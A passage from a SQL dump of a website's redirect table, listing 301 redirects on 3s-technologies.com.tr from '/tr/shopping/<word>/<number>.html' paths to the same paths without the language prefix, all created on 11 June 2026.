00:00:00',301),(76390,'https://3s-technologies.com.tr/tr/shopping/favorless/463474485.html',NULL,'https://3s-technologies.com.tr/shopping/favorless/463474485.html','',1,0,'2026-06-11 09:00:06','0000-00-00 00:00:00',301),(76391,'https://3s-technologies.com.tr/tr/shopping/hatchelled/3881843743.html',NULL,'https://3s-technologies.com.tr/shopping/hatchelled/3881843743.html','',1,0,'2026-06-11 09:00:09','0000-00-00 00:00:00',301),(76392,'https://3s-technologies.com.tr/tr/shopping/testamur/1489891189.html',NULL,'https://3s-technologies.com.tr/shopping/testamur/1489891189.html','',1,0,'2026-06-11 09:00:12','0000-00-00 00:00:00',301),(76393,'https://3s-technologies.com.tr/tr/shopping/winced/2557663359.html',NULL,'https://3s-technologies.com.tr/shopping/winced/2557663359.html','',1,0,'2026-06-11 09:00:15','0000-00-00 00:00:00',301),(76394,'https://3s-technologies.com.tr/tr/shopping/avision/318307540.html',NULL,'https://3s-technologies.com.tr/shopping/avision/318307540.html','',1,0,'2026-06-11 09:00:18','0000-00-00 00:00:00',301),(76395,'https://3s-technologies.com.tr/tr/shopping/exorbitance/3776693840.html',NULL,'https://3s-technologies.com.tr/shopping/exorbitance/3776693840.html','',1,0,'2026-06-11 09:00:21','0000-00-00 00:00:00',301),(76396,'https://3s-technologies.com.tr/tr/shopping/conventual/933640310.html',NULL,'https://3s-technologies.com.tr/shopping/conventual/933640310.html','',1,0,'2026-06-11 09:00:24','0000-00-00 00:00:00',301),(76397,'https://3s-technologies.com.tr/tr/shopping/amplified/224246528.html',NULL,'https://3s-technologies.com.tr/shopping/amplified/224246528.html','',1,0,'2026-06-11 09:00:27','0000-00-00 00:00:00',301),(76398,'https://3s-technologies.com.tr/tr/shopping/upplight/3713418849.html',NULL,'https://3s-technologies.com.tr/shopping/upplight/3713418849.html','',1,0,'2026-06-11 09:00:30','0000-00-00 00:00:00',301),(76399,'https://3s-technologies.com.tr/tr/shopping/insatiately/572360860.html',NULL,'https://3s-technologies.com.tr/shopping/insatiately/572360860.html','',1,0,'2026-06-11 09:00:33','0000-00-00 00:00:00',301),(76400,'https://3s-technologies.com.tr/tr/shopping/mithraicism/3673898506.html',NULL,'https://3s-technologies.com.tr/shopping/mithraicism/3673898506.html','',1,0,'2026-06-11 09:00:36','0000-00-00 00:00:00',301),(76401,'https://3s-technologies.com.tr/tr/shopping/schismatize/25567748.html',NULL,'https://3s-technologies.com.tr/shopping/schismatize/25567748.html','',1,0,'2026-06-11 09:00:39','0000-00-00 00:00:00',301),(76402,'https://3s-technologies.com.tr/tr/shopping/prateful/3863805586.html',NULL,'https://3s-technologies.com.tr/shopping/prateful/3863805586.html','',1,0,'2026-06-11 09:00:42','0000-00-00 00:00:00',301),(76403,'https://3s-technologies.com.tr/tr/shopping/hydatoid/3401101505.html',NULL,'https://3s-technologies.com.tr/shopping/hydatoid/3401101505.html','',1,0,'2026-06-11 09:00:45','0000-00-00 00:00:00',301),(76404,'https://3s-technologies.com.tr/tr/shopping/xanthopous/463638008.html',NULL,'https://3s-technologies.com.tr/shopping/xanthopous/463638008.html','',1,0,'2026-06-11 09:00:48','0000-00-00 00:00:00',301),(76405,'https://3s-technologies.com.tr/tr/shopping/anthysteric/3837447178.html',NULL,'https://3s-technologies.com.tr/shopping/anthysteric/3837447178.html','',1,0,'2026-06-11 09:00:51','0000-00-00 00:00:00',301),(76406,'https://3s-technologies.com.tr/tr/shopping/wending/2331687089.html',NULL,'https://3s-technologies.com.tr/shopping/wending/2331687089.html','',1,0,'2026-06-11 09:00:54','0000-00-00 00:00:00',301),(76407,'https://3s-technologies.com.tr/tr/shopping/pollock/816777636.html',NULL,'https://3s-technologies.com.tr/shopping/pollock/816777636.html','',1,0,'2026-06-11 09:00:57','0000-00-00 00:00:00',301),(76408,'https://3s-technologies.com.tr/tr/shopping/contumely/458885713.html',NULL,'https://3s-technologies.com.tr/shopping/contumely/458885713.html','',1,0,'2026-06-11 09:01:00','0000-00-00 00:00:00',301),(76409,'https://3s-technologies.com.tr/tr/shopping/shatter/3727475351.html',NULL,'https://3s-technologies.com.tr/shopping/shatter/3727475351.html','',1,0,'2026-06-11 09:01:03','0000-00-00 00:00:00',301),(76410,'https://3s-technologies.com.tr/tr/shopping/proverbial/3322939992.html',NULL,'https://3s-technologies.com.tr/shopping/proverbial/3322939992.html','',1,0,'2026-06-11 09:01:10','0000-00-00 00:00:00',301),(76411,'https://3s-technologies.com.tr/tr/shopping/trecento/854542519.html',NULL,'https://3s-technologies.com.tr/shopping/trecento/854542519.html','',1,0,'2026-06-11 09:01:15','0000-00-00 00:00:00',301),(76412,'https://3s-technologies.com.tr/tr/shopping/sibylline/2633464346.html',NULL,'https://3s-technologies.com.tr/shopping/sibylline/2633464346.html','',1,0,'2026-06-11 09:01:18','0000-00-00 00:00:00',301),(76413,'https://3s-technologies.com.tr/tr/shopping/pygidia/4196038327.html',NULL,'https://3s-technologies.com.tr/shopping/pygidia/4196038327.html','',1,0,'2026-06-11 09:01:21','0000-00-00 00:00:00',301),(76414,'https://3s-technologies.com.tr/tr/shopping/pommeling/3990786682.html',NULL,'https://3s-technologies.com.tr/shopping/pommeling/3990786682.html','',1,0,'2026-06-11 09:01:27','0000-00-00 00:00:00',301),(76415,'https://3s-technologies.com.tr/tr/shopping/piscis/883401063.html',NULL,'https://3s-technologies.com.tr/shopping/piscis/883401063.html','',1,0,'2026-06-11 09:01:31','0000-00-00 00:00:00',301),(76416,'https://3s-technologies.com.tr/tr/shopping/grabbing/3308294371.html',NULL,'https://3s-technologies.com.tr/shopping/grabbing/3308294371.html','',1,0,'2026-06-11 09:01:34','0000-00-00 00:00:00',301),(76417,'https://3s-technologies.com.tr/tr/shopping/selfannihilated/3183779608.html',NULL,'https://3s-technologies.com.tr/shopping/selfannihilated/3183779608.html','',1,0,'2026-06-11 09:01:37','0000-00-00 00:00:00',301),(76418,'https://3s-technologies.com.tr/tr/shopping/irishman/909975520.html',NULL,'https://3s-technologies.com.tr/shopping/irishman/909975520.html','',1,0,'2026-06-11 09:01:40','0000-00-00 00:00:00',301),(76419,'https://3s-technologies.com.tr/tr/shopping/djereed/799335013.html',NULL,'https://3s-technologies.com.tr/shopping/djereed/799335013.html','',1,0,'2026-06-11 09:01:43','0000-00-00 00:00:00',301),(76420,'https://3s-technologies.com.tr/tr/shopping/calendaring/3109390569.html',NULL,'https://3s-technologies.com.tr/shopping/calendaring/3109390569.html','',1,0,'2026-06-11 09:01:46','0000-00-00 00:00:00',301),(76421,'https://3s-technologies.com.tr/tr/shopping/aculeatus/3324315630.html',NULL,'https://3s-technologies.com.tr/shopping/aculeatus/3324315630.html','',1,0,'2026-06-11 09:01:49','0000-00-00 00:00:00',301),(76422,'https://3s-technologies.com.tr/tr/shopping/victual/596025666.html',NULL,'https://3s-technologies.com.tr/shopping/victual/596025666.html','',1,0,'2026-06-11 09:01:54','0000-00-00 00:00:00',301),(76423,'https://3s-technologies.com.tr/tr/shopping/vexer/3076720126.html',NULL,'https://3s-technologies.com.tr/shopping/vexer/3076720126.html','',1,0,'2026-06-11 09:01:57','0000-00-00 00:00:00',301),(76424,'https://3s-technologies.com.tr/tr/shopping/uplifting/1836072642.html',NULL,'https://3s-technologies.com.tr/shopping/uplifting/1836072642.html','',1,0,'2026-06-11 09:02:00','0000-00-00 00:00:00',301),(76425,'https://3s-technologies.com.tr/tr/shopping/bellylaugh/2014558524.html',NULL,'https://3s-technologies.com.tr/shopping/bellylaugh/2014558524.html','',1,0,'2026-06-11 09:02:03','0000-00-00 00:00:00',301),(76426,'https://3s-technologies.com.tr/tr/shopping/lodger/241765105.html',NULL,'https://3s-technologies.com.tr/shopping/lodger/241765105.html','',1,0,'2026-06-11 09:02:06','0000-00-00 00:00:00',301),(76427,'https://3s-technologies.com.tr/tr/shopping/acquaintedness/2368416715.html',NULL,'https://3s-technologies.com.tr/shopping/acquaintedness/2368416715.html','',1,0,'2026-06-11 09:02:09','0000-00-00 00:00:00',301),(76428,'https://3s-technologies.com.tr/tr/shopping/varnished/586953546.html',NULL,'https://3s-technologies.com.tr/shopping/varnished/586953546.html','',1,0,'2026-06-11 09:02:12','0000-00-00 00:00:00',301),(76429,'https://3s-technologies.com.tr/tr/shopping/refresher/2237626061.html',NULL,'https://3s-technologies.com.tr/shopping/refresher/2237626061.html','',1,0,'2026-06-11 09:02:15','0000-00-00 00:00:00',301),(76430,'https://3s-technologies.com.tr/tr/shopping/threesquare/3350526330.html',NULL,'https://3s-technologies.com.tr/shopping/threesquare/3350526330.html','',1,0,'2026-06-11 09:02:18','0000-00-00 00:00:00',301),(76431,'https://3s-technologies.com.tr/tr/shopping/blabera/150398592.html',NULL,'https://3s-technologies.com.tr/shopping/blabera/150398592.html','',1,0,'2026-06-11 09:02:21','0000-00-00 00:00:00',301),(76432,'https://3s-technologies.com.tr/tr/shopping/carse/2901247672.html',NULL,'https://3s-technologies.com.tr/shopping/carse/2901247672.html','',1,0,'2026-06-11 09:02:24','0000-00-00 00:00:00',301),(76433,'https://3s-technologies.com.tr/tr/shopping/whetile/1416416993.html',NULL,'https://3s-technologies.com.tr/shopping/whetile/1416416993.html','',1,0,'2026-06-11 09:02:29','0000-00-00 00:00:00',301),(76434,'https://3s-technologies.com.tr/tr/shopping/caudad/4210011789.html',NULL,'https://3s-technologies.com.tr/shopping/caudad/4210011789.html','',1,0,'2026-06-11 09:02:33','0000-00-00 00:00:00',301),(76435,'https://3s-technologies.com.tr/tr/shopping/sepon/1260091900.html',NULL,'https://3s-technologies.com.tr/shopping/sepon/1260091900.html','',1,0,'2026-06-11 09:02:36','0000-00-00 00:00:00',301),(76436,'https://3s-technologies.com.tr/tr/shopping/wetshod/519314433.html',NULL,'https://3s-technologies.com.tr/shopping/wetshod/519314433.html','',1,0,'2026-06-11 09:02:39','0000-00-00 00:00:00',301),(76437,'https://3s-technologies.com.tr/tr/shopping/gobline/1368991296.html',NULL,'https://3s-technologies.com.tr/shopping/gobline/1368991296.html','',1,0,'2026-06-11 09:02:42','0000-00-00 00:00:00',301),(76438,'https://3s-technologies.com.tr/tr/shopping/frail/3189260796.html',NULL,'https://3s-technologies.com.tr/shopping/frail/3189260796.html','',1,0,'2026-06-11 09:02:45','0000-00-00 00:00:00',301),(76439,'https://3s-technologies.com.tr/tr/shopping/arctilis/3820170322.html',NULL,'https://3s-technologies.com.tr/shopping/arctilis/3820170322.html','',1,0,'2026-06-11 09:02:48','0000-00-00 00:00:00',301),(76440,'https://3s-technologies.com.tr/tr/shopping/supervacaneous/2410897189.html',NULL,'https://3s-technologies.com.tr/shopping/supervacaneous/2410897189.html','',1,0,'2026-06-11 09:02:51','0000-00-00 00:00:00',301),(76441,'https://3s-technologies.com.tr/tr/shopping/serpulite/867292747.html',NULL,'https://3s-technologies.com.tr/shopping/serpulite/867292747.html','',1,0,'2026-06-11 09:02:54','0000-00-00 00:00:00',301),(76442,'https://3s-technologies.com.tr/tr/shopping/colloquially/2172499968.html',NULL,'https://3s-technologies.com.tr/shopping/colloquially/2172499968.html','',1,0,'2026-06-11 09:02:57','0000-00-00 00:00:00',301),(76443,'https://3s-technologies.com.tr/tr/shopping/stiller/973652884.html',NULL,'https://3s-technologies.com.tr/shopping/stiller/973652884.html','',1,0,'2026-06-11 09:03:00','0000-00-00 00:00:00',301),(76444,'https://3s-technologies.com.tr/tr/shopping/whereabout/3187917598.html',NULL,'https://3s-technologies.com.tr/shopping/whereabout/3187917598.html','',1,0,'2026-06-11 09:03:03','0000-00-00 00:00:00',301),(76445,'https://3s-technologies.com.tr/tr/shopping/anser/2922264650.html',NULL,'https://3s-technologies.com.tr/shopping/anser/2922264650.html','',1,0,'2026-06-11 09:03:06','0000-00-00 00:00:00',301),(76446,'https://3s-technologies.com.tr/tr/shopping/strenuousness/3388204140.html',NULL,'https://3s-technologies.com.tr/shopping/strenuousness/3388204140.html','',1,0,'2026-06-11 09:03:09','0000-00-00 00:00:00',301),(76447,'https://3s-technologies.com.tr/tr/shopping/medusoid/3918484096.html',NULL,'https://3s-technologies.com.tr/shopping/medusoid/3918484096.html','',1,0,'2026-06-11 09:03:12','0000-00-00 00:00:00',301),(76448,'https://3s-technologies.com.tr/tr/shopping/lichenic/3352690920.html',NULL,'https://3s-technologies.com.tr/shopping/lichenic/3352690920.html','',1,0,'2026-06-11 09:03:15','0000-00-00 00:00:00',301),(76449,'https://3s-technologies.com.tr/tr/shopping/podisus/494878955.html',NULL,'https://3s-technologies.com.tr/shopping/podisus/494878955.html','',1,0,'2026-06-11 09:03:18','0000-00-00 00:00:00',301),(76450,'https://3s-technologies.com.tr/tr/shopping/chloroperla/2457014659.html',NULL,'https://3s-technologies.com.tr/shopping/chloroperla/2457014659.html','',1,0,'2026-06-11 09:03:21','0000-00-00 00:00:00',301),(76451,'https://3s-technologies.com.tr/tr/shopping/laeta/1581299513.html',NULL,'https://3s-technologies.com.tr/shopping/laeta/1581299513.html','',1,0,'2026-06-11 09:03:24','0000-00-00 00:00:00',301),(76452,'https://3s-technologies.com.tr/tr/shopping/impasto/3313704551.html',NULL,'https://3s-technologies.com.tr/shopping/impasto/3313704551.html','',1,0,'2026-06-11 09:03:27','0000-00-00 00:00:00',301),(76453,'https://3s-technologies.com.tr/tr/shopping/stainder/2849354899.html',NULL,'https://3s-technologies.com.tr/shopping/stainder/2849354899.html','',1,0,'2026-06-11 09:03:30','0000-00-00 00:00:00',301),(76454,'https://3s-technologies.com.tr/tr/shopping/swarming/3875561480.html',NULL,'https://3s-technologies.com.tr/shopping/swarming/3875561480.html','',1,0,'2026-06-11 09:03:33','0000-00-00 00:00:00',301),(76455,'https://3s-technologies.com.tr/tr/shopping/overagitate/2854583276.html',NULL,'https://3s-technologies.com.tr/shopping/overagitate/2854583276.html','',1,0,'2026-06-11 09:03:36','0000-00-00 00:00:00',301),(76456,'https://3s-technologies.com.tr/tr/shopping/cynocrambe/1999514530.html',NULL,'https://3s-technologies.com.tr/shopping/cynocrambe/1999514530.html','',1,0,'2026-06-11 09:03:39','0000-00-00 00:00:00',301),(76457,'https://3s-technologies.com.tr/tr/shopping/ferine/3899571601.html',NULL,'https://3s-technologies.com.tr/shopping/ferine/3899571601.html','',1,0,'2026-06-11 09:03:42','0000-00-00 00:00:00',301),(76458,'https://3s-technologies.com.tr/tr/shopping/shtick/2400475106.html',NULL,'https://3s-technologies.com.tr/shopping/shtick/2400475106.html','',1,0,'2026-06-11 09:03:45','0000-00-00 00:00:00',301),(76459,'https://3s-technologies.com.tr/tr/shopping/satrapical/2576697566.html',NULL,'https://3s-technologies.com.tr/shopping/satrapical/2576697566.html','',1,0,'2026-06-11 09:03:48','0000-00-00 00:00:00',301),(76460,'https://3s-technologies.com.tr/tr/shopping/cancroides/171886701.html',NULL,'https://3s-technologies.com.tr/shopping/cancroides/171886701.html','',1,0,'2026-06-11 09:03:51','0000-00-00 00:00:00',301),(76461,'https://3s-technologies.com.tr/tr/shopping/proteaceous/1531676818.html',NULL,'https://3s-technologies.com.tr/shopping/proteaceous/1531676818.html','',1,0,'2026-06-11 09:03:54','0000-00-00 00:00:00',301),(76462,'https://3s-technologies.com.tr/tr/shopping/rabbet/266520282.html',NULL,'https://3s-technologies.com.tr/shopping/rabbet/266520282.html','',1,0,'2026-06-11 09:04:02','0000-00-00 00:00:00',301),(76463,'https://3s-technologies.com.tr/tr/shopping/brashy/1244719617.html',NULL,'https://3s-technologies.com.tr/shopping/brashy/1244719617.html','',1,0,'2026-06-11 09:04:04','0000-00-00 00:00:00',301),(76464,'https://3s-technologies.com.tr/tr/shopping/julienne/3527706200.html',NULL,'https://3s-technologies.com.tr/shopping/julienne/3527706200.html','',1,0,'2026-06-11 09:04:07','0000-00-00 00:00:00',301),(76465,'https://3s-technologies.com.tr/tr/shopping/risker/2114167190.html',NULL,'https://3s-technologies.com.tr/shopping/risker/2114167190.html','',1,0,'2026-06-11 09:04:10','0000-00-00 00:00:00',301),(76466,'https://3s-technologies.com.tr/tr/shopping/alldevouring/1691022809.html',NULL,'https://3s-technologies.com.tr/shopping/alldevouring/1691022809.html','',1,0,'2026-06-11 09:04:13','0000-00-00 00:00:00',301),(76467,'https://3s-technologies.com.tr/tr/shopping/intomb/3113901204.html',NULL,'https://3s-technologies.com.tr/shopping/intomb/3113901204.html','',1,0,'2026-06-11 09:04:16','0000-00-00 00:00:00',301),(76468,'https://3s-technologies.com.tr/tr/shopping/phenylic/4070995976.html',NULL,'https://3s-technologies.com.tr/shopping/phenylic/4070995976.html','',1,0,'2026-06-11 09:04:19','0000-00-00 00:00:00',301),(76469,'https://3s-technologies.com.tr/tr/shopping/tangelo/2731456968.html',NULL,'https://3s-technologies.com.tr/shopping/tangelo/2731456968.html','',1,0,'2026-06-11 09:04:22','0000-00-00 00:00:00',301),(76470,'https://3s-technologies.com.tr/tr/shopping/jacobite/3898978742.html',NULL,'https://3s-technologies.com.tr/shopping/jacobite/3898978742.html','',1,0,'2026-06-11 09:04:25','0000-00-00 00:00:00',301),(76471,'https://3s-technologies.com.tr/tr/shopping/prosomata/3233070829.html',NULL,'https://3s-technologies.com.tr/shopping/prosomata/3233070829.html','',1,0,'2026-06-11 09:04:28','0000-00-00 00:00:00',301),(76472,'https://3s-technologies.com.tr/tr/shopping/seethe/1710574558.html',NULL,'https://3s-technologies.com.tr/shopping/seethe/1710574558.html','',1,0,'2026-06-11 09:04:31','0000-00-00 00:00:00',301),(76473,'https://3s-technologies.com.tr/tr/shopping/overpraising/3144705643.html',NULL,'https://3s-technologies.com.tr/shopping/overpraising/3144705643.html','',1,0,'2026-06-11 09:04:34','0000-00-00 00:00:00',301),(76474,'https://3s-technologies.com.tr/tr/shopping/morrice/1854920446.html',NULL,'https://3s-technologies.com.tr/shopping/morrice/1854920446.html','',1,0,'2026-06-11 09:04:37','0000-00-00 00:00:00',301),(76475,'https://3s-technologies.com.tr/tr/shopping/hypnotic/2246751053.html',NULL,'https://3s-technologies.com.tr/shopping/hypnotic/2246751053.html','',1,0,'2026-06-11 09:04:40','0000-00-00 00:00:00',301),(76476,'https://3s-technologies.com.tr/tr/shopping/sales/3512775360.html',NULL,'https://3s-technologies.com.tr/shopping/sales/3512775360.html','',1,0,'2026-06-11 09:04:43','0000-00-00 00:00:00',301),(76477,'https://3s-technologies.com.tr/tr/shopping/twinkling/1950322111.html',NULL,'https://3s-technologies.com.tr/shopping/twinkling/1950322111.html','',1,0,'2026-06-11 09:04:47','0000-00-00 00:00:00',301),(76478,'https://3s-technologies.com.tr/tr/shopping/fraughted/3170668016.html',NULL,'https://3s-technologies.com.tr/shopping/fraughted/3170668016.html','',1,0,'2026-06-11 09:04:49','0000-00-00 00:00:00',301),(76479,'https://3s-technologies.com.tr/tr/shopping/discontentful/118887344.html',NULL,'https://3s-technologies.com.tr/shopping/discontentful/118887344.html','',1,0,'2026-06-11 09:04:55','0000-00-00 00:00:00',301),(76480,'https://3s-technologies.com.tr/tr/shopping/salvatory/2439496098.html',NULL,'https://3s-technologies.com.tr/shopping/salvatory/2439496098.html','',1,0,'2026-06-11 09:04:57','0000-00-00 00:00:00',301),(76481,'https://3s-technologies.com.tr/tr/shopping/pallid/3047911967.html',NULL,'https://3s-technologies.com.tr/shopping/pallid/3047911967.html','',1,0,'2026-06-11 09:05:00','0000-00-00 00:00:00',301),(76482,'https://3s-technologies.com.tr/tr/shopping/isochasm/1436705094.html',NULL,'https://3s-technologies.com.tr/shopping/isochasm/1436705094.html','',1,0,'2026-06-11 09:05:03','0000-00-00 00:00:00',301),(76483,'https://3s-technologies.com.tr/tr/shopping/heddle/4258863812.html',NULL,'https://3s-technologies.com.tr/shopping/heddle/4258863812.html','',1,0,'2026-06-11 09:05:06','0000-00-00 00:00:00',301),(76484,'https://3s-technologies.com.tr/tr/shopping/trehala/2500033403.html',NULL,'https://3s-technologies.com.tr/shopping/trehala/2500033403.html','',1,0,'2026-06-11 09:05:09','0000-00-00 00:00:00',301),(76485,'https://3s-technologies.com.tr/tr/shopping/nadir/1152961059.html',NULL,'https://3s-technologies.com.tr/shopping/nadir/1152961059.html','',1,0,'2026-06-11 09:05:12','0000-00-00 00:00:00',301),(76486,'https://3s-technologies.com.tr/tr/shopping/moodir/517807712.html',NULL,'https://3s-technologies.com.tr/shopping/moodir/517807712.html','',1,0,'2026-06-11 09:05:15','0000-00-00 00:00:00',301),(76487,'https://3s-technologies.com.tr/tr/shopping/wastrel/985549296.html',NULL,'https://3s-technologies.com.tr/shopping/wastrel/985549296.html','',1,0,'2026-06-11 09:05:18','0000-00-00 00:00:00',301),(76488,'https://3s-technologies.com.tr/tr/shopping/embalm/954100832.html',NULL,'https://3s-technologies.com.tr/shopping/embalm/954100832.html','',1,0,'2026-06-11 09:05:21','0000-00-00 00:00:00',301),(76489,'https://3s-technologies.com.tr/tr/shopping/peastone/4205422985.html',NULL,'https://3s-technologies.com.tr/shopping/peastone/4205422985.html','',1,0,'2026-06-11 09:05:24','0000-00-00 00:00:00',301),(76490,'https://3s-technologies.com.tr/tr/shopping/bullfighting/3500528703.html',NULL,'https://3s-technologies.com.tr/shopping/bullfighting/3500528703.html','',1,0,'2026-06-11 09:05:27','0000-00-00 00:00:00',301),(76491,'https://3s-technologies.com.tr/tr/shopping/deathliness/1316727597.html',NULL,'https://3s-technologies.com.tr/shopping/deathliness/1316727597.html','',1,0,'2026-06-11 09:05:30','0000-00-00 00:00:00',301),(76492,'https://3s-technologies.com.tr/tr/shopping/quaternate/1668377206.html',NULL,'https://3s-technologies.com.tr/shopping/quaternate/1668377206.html','',1,0,'2026-06-11 09:05:33','0000-00-00 00:00:00',301),(76493,'https://3s-technologies.com.tr/tr/shopping/dermopteri/318429252.html',NULL,'https://3s-technologies.com.tr/shopping/dermopteri/318429252.html','',1,0,'2026-06-11 09:05:36','0000-00-00 00:00:00',301),(76494,'https://3s-technologies.com.tr/tr/shopping/cabomba/260677600.html',NULL,'https://3s-technologies.com.tr/shopping/cabomba/260677600.html','',1,0,'2026-06-11 09:05:39','0000-00-00 00:00:00',301),(76495,'https://3s-technologies.com.tr/tr/shopping/longlasting/1145784550.html',NULL,'https://3s-technologies.com.tr/shopping/longlasting/1145784550.html','',1,0,'2026-06-11 09:05:42','0000-00-00 00:00:00',301),(76496,'https://3s-technologies.com.tr/tr/shopping/egest/3226487163.html',NULL,'https://3s-technologies.com.tr/shopping/egest/3226487163.html','',1,0,'2026-06-11 09:05:45','0000-00-00 00:00:00',301),(76497,'https://3s-technologies.com.tr/tr/shopping/nascent/3066251936.html',NULL,'https://3s-technologies.com.tr/shopping/nascent/3066251936.html','',1,0,'2026-06-11 09:05:48','0000-00-00 00:00:00',301),(76498,'https://3s-technologies.com.tr/tr/shopping/lignum/2949175046.html',NULL,'https://3s-technologies.com.tr/shopping/lignum/2949175046.html','',1,0,'2026-06-11 09:05:51','0000-00-00 00:00:00',301),(76499,'https://3s-technologies.com.tr/tr/shopping/genoa/2067001117.html',NULL,'https://3s-technologies.com.tr/shopping/genoa/2067001117.html','',1,0,'2026-06-11 09:05:54','0000-00-00 00:00:00',301),(76500,'https://3s-technologies.com.tr/tr/shopping/mahjong/3112810833.html',NULL,'https://3s-technologies.com.tr/shopping/mahjong/3112810833.html','',1,0,'2026-06-11 09:05:57','0000-00-00 00:00:00',301),(76501,'https://3s-technologies.com.tr/tr/shopping/allnight/1004461791.html',NULL,'https://3s-technologies.com.tr/shopping/allnight/1004461791.html','',1,0,'2026-06-11 09:06:01','0000-00-00 00:00:00',301),(76502,'https://3s-technologies.com.tr/tr/shopping/serotinous/737629184.html',NULL,'https://3s-technologies.com.tr/shopping/serotinous/737629184.html','',1,0,'2026-06-11 09:06:03','0000-00-00 00:00:00',301),(76503,'https://3s-technologies.com.tr/tr/shopping/kallima/1901727874.html',NULL,'https://3s-technologies.com.tr/shopping/kallima/1901727874.html','',1,0,'2026-06-11 09:06:06','0000-00-00 00:00:00',301),(76504,'https://3s-technologies.com.tr/tr/shopping/dipogon/273773095.html',NULL,'https://3s-technologies.com.tr/shopping/dipogon/273773095.html','',1,0,'2026-06-11 09:06:09','0000-00-00 00:00:00',301),(76505,'https://3s-technologies.com.tr/tr/shopping/arctia/3617358937.html',NULL,'https://3s-technologies.com.tr/shopping/arctia/3617358937.html','',1,0,'2026-06-11 09:06:12','0000-00-00 00:00:00',301),(76506,'https://3s-technologies.com.tr/tr/shopping/chloridic/417987565.html',NULL,'https://3s-technologies.com.tr/shopping/chloridic/417987565.html','',1,0,'2026-06-11 09:06:15','0000-00-00 00:00:00',301),(76507,'https://3s-technologies.com.tr/tr/shopping/malleating/2324632276.html',NULL,'https://3s-technologies.com.tr/shopping/malleating/2324632276.html','',1,0,'2026-06-11 09:06:21','0000-00-00 00:00:00',301),(76508,'https://3s-technologies.com.tr/tr/shopping/catholicon/4046114152.html',NULL,'https://3s-technologies.com.tr/shopping/catholicon/4046114152.html','',1,0,'2026-06-11 09:06:24','0000-00-00 00:00:00',301),(76509,'https://3s-technologies.com.tr/tr/shopping/inconvincibly/3327814031.html',NULL,'https://3s-technologies.com.tr/shopping/inconvincibly/3327814031.html','',1,0,'2026-06-11 09:06:27','0000-00-00 00:00:00',301),(76510,'https://3s-technologies.com.tr/tr/shopping/credendum/2613128638.html',NULL,'https://3s-technologies.com.tr/shopping/credendum/2613128638.html','',1,0,'2026-06-11 09:06:30','0000-00-00 00:00:00',301),(76511,'https://3s-technologies.com.tr/tr/shopping/bdellomorpha/1726717497.html',NULL,'https://3s-technologies.com.tr/shopping/bdellomorpha/1726717497.html','',1,0,'2026-06-11 09:06:33','0000-00-00 00:00:00',301),(76512,'https://3s-technologies.com.tr/tr/shopping/geloscopy/1957282571.html',NULL,'https://3s-technologies.com.tr/shopping/geloscopy/1957282571.html','',1,0,'2026-06-11 09:06:36','0000-00-00 00:00:00',301),(76513,'https://3s-technologies.com.tr/tr/shopping/rachis/1632307530.html',NULL,'https://3s-technologies.com.tr/shopping/rachis/1632307530.html','',1,0,'2026-06-11 09:06:46','0000-00-00 00:00:00',301),(76514,'https://3s-technologies.com.tr/tr/shopping/unrightwise/4278678094.html',NULL,'https://3s-technologies.com.tr/shopping/unrightwise/4278678094.html','',1,0,'2026-06-11 09:06:50','0000-00-00 00:00:00',301),(76515,'https://3s-technologies.com.tr/tr/shopping/eriodendron/2752402635.html',NULL,'https://3s-technologies.com.tr/shopping/eriodendron/2752402635.html','',1,0,'2026-06-11 09:06:54','0000-00-00 00:00:00',301),(76516,'https://3s-technologies.com.tr/tr/shopping/whiten/2826902208.html',NULL,'https://3s-technologies.com.tr/shopping/whiten/2826902208.html','',1,0,'2026-06-11 09:06:57','0000-00-00 00:00:00',301),(76517,'https://3s-technologies.com.tr/tr/shopping/wastefulness/1802169561.html',NULL,'https://3s-technologies.com.tr/shopping/wastefulness/1802169561.html','',1,0,'2026-06-11 09:07:00','0000-00-00 00:00:00',301),(76518,'https://3s-technologies.com.tr/tr/shopping/panfuls/1146996649.html',NULL,'https://3s-technologies.com.tr/shopping/panfuls/1146996649.html','',1,0,'2026-06-11 09:07:03','0000-00-00 00:00:00',301),(76519,'https://3s-technologies.com.tr/tr/shopping/colleagueship/777878356.html',NULL,'https://3s-technologies.com.tr/shopping/colleagueship/777878356.html','',1,0,'2026-06-11 09:07:06','0000-00-00 00:00:00',301),(76520,'https://3s-technologies.com.tr/tr/shopping/grapheme/4012894063.html',NULL,'https://3s-technologies.com.tr/shopping/grapheme/4012894063.html','',1,0,'2026-06-11 09:07:09','0000-00-00 00:00:00',301),(76521,'https://3s-technologies.com.tr/tr/shopping/xiphophyllous/3272259318.html',NULL,'https://3s-technologies.com.tr/shopping/xiphophyllous/3272259318.html','',1,0,'2026-06-11 09:07:12','0000-00-00 00:00:00',301),(76522,'https://3s-technologies.com.tr/tr/shopping/geneva/1707986821.html',NULL,'https://3s-technologies.com.tr/shopping/geneva/1707986821.html','',1,0,'2026-06-11 09:07:15','0000-00-00 00:00:00',301),(76523,'https://3s-technologies.com.tr/tr/shopping/delitescence/2262061523.html',NULL,'https://3s-technologies.com.tr/shopping/delitescence/2262061523.html','',1,0,'2026-06-11 09:07:18','0000-00-00 00:00:00',301),(76524,'https://3s-technologies.com.tr/tr/shopping/sacred/1690286425.html',NULL,'https://3s-technologies.com.tr/shopping/sacred/1690286425.html','',1,0,'2026-06-11 09:07:20','0000-00-00 00:00:00',301),(76525,'https://3s-technologies.com.tr/tr/shopping/pleasureful/3349019609.html',NULL,'https://3s-technologies.com.tr/shopping/pleasureful/3349019609.html','',1,0,'2026-06-11 09:07:24','0000-00-00 00:00:00',301),(76526,'https://3s-technologies.com.tr/tr/shopping/cosmetologist/995284199.html',NULL,'https://3s-technologies.com.tr/shopping/cosmetologist/995284199.html','',1,0,'2026-06-11 09:07:27','0000-00-00 00:00:00',301),(76527,'https://3s-technologies.com.tr/tr/shopping/melaphyre/1806790773.html',NULL,'https://3s-technologies.com.tr/shopping/melaphyre/1806790773.html','',1,0,'2026-06-11 09:07:30','0000-00-00 00:00:00',301),(76528,'https://3s-technologies.com.tr/tr/shopping/cassine/12577868.html',NULL,'https://3s-technologies.com.tr/shopping/cassine/12577868.html','',1,0,'2026-06-11 09:07:33','0000-00-00 00:00:00',301),(76529,'https://3s-technologies.com.tr/tr/shopping/tulipist/4199458591.html',NULL,'https://3s-technologies.com.tr/shopping/tulipist/4199458591.html','',1,0,'2026-06-11 09:07:36','0000-00-00 00:00:00',301),(76530,'https://3s-technologies.com.tr/tr/shopping/disavowable/2124425766.html',NULL,'https://3s-technologies.com.tr/shopping/disavowable/2124425766.html','',1,0,'2026-06-11 09:07:39','0000-00-00 